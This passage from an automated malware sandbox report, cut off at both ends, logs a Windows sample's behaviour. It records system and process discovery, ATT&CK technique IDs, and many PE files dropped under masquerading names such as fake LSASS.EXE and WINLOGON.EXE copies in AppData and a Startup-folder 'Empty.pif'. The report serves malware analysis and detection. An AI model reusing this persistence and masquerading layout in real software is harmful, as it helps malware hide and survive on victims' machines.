\"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"D3_08.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"IExplorer.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"WINLOGON.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"CSRSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SERVICES.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"LSASS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"SMSS.EXE\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"4\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"264\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"352\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"392\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"400\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"456\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"492\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"508\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"516\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"612\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"692\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"780\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"820\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"872\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"896\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1244\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1268\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1328\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1488\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1548\"}\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"1556\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" opened \"\\Device\\KsecDD\"\n \"D3_08.exe\" opened \"\\Device\\KsecDD\"\n \"IExplorer.exe\" opened \"\\Device\\KsecDD\"\n \"WINLOGON.EXE\" opened \"\\Device\\KsecDD\"\n \"CSRSS.EXE\" opened \"\\Device\\KsecDD\"\n \"SERVICES.EXE\" opened \"\\Device\\KsecDD\"\n \"LSASS.EXE\" opened \"\\Device\\KsecDD\"\n \"SMSS.EXE\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"D3_08.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\desktop.ini\"\n \"IExplorer.exe\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"WINLOGON.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\desktop.ini\"\n \"CSRSS.EXE\" reads file \"C:\\Users\\%OSUSER%\\Documents\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\share\\D3_08\\New Folder.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 65536 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Local\\services.exe\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000c80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46786 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46921 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46941 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46934 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46879 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46896 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46767 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46734 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46819 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46866 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46860 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46823 bytes starting with PE header signature to file \"C:\\Data %OSUSER%.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46791 bytes starting with PE header signature to file \"C:\\Windows\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46852 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46777 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46788 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46851 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46811 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46826 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46872 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46851 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46935 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46889 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"78641cb5a706c6ac8de42c1c1b751805dc54c509fb82eb142db5f0cf5a1c92f9.exe\" wrote 46713 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46817 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 47001 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46894 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46999 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46801 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46922 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46785 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46873 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46925 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46777 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46909 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 47008 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46845 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46855 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46648 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46865 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46963 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46848 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46894 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46806 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46709 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46871 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 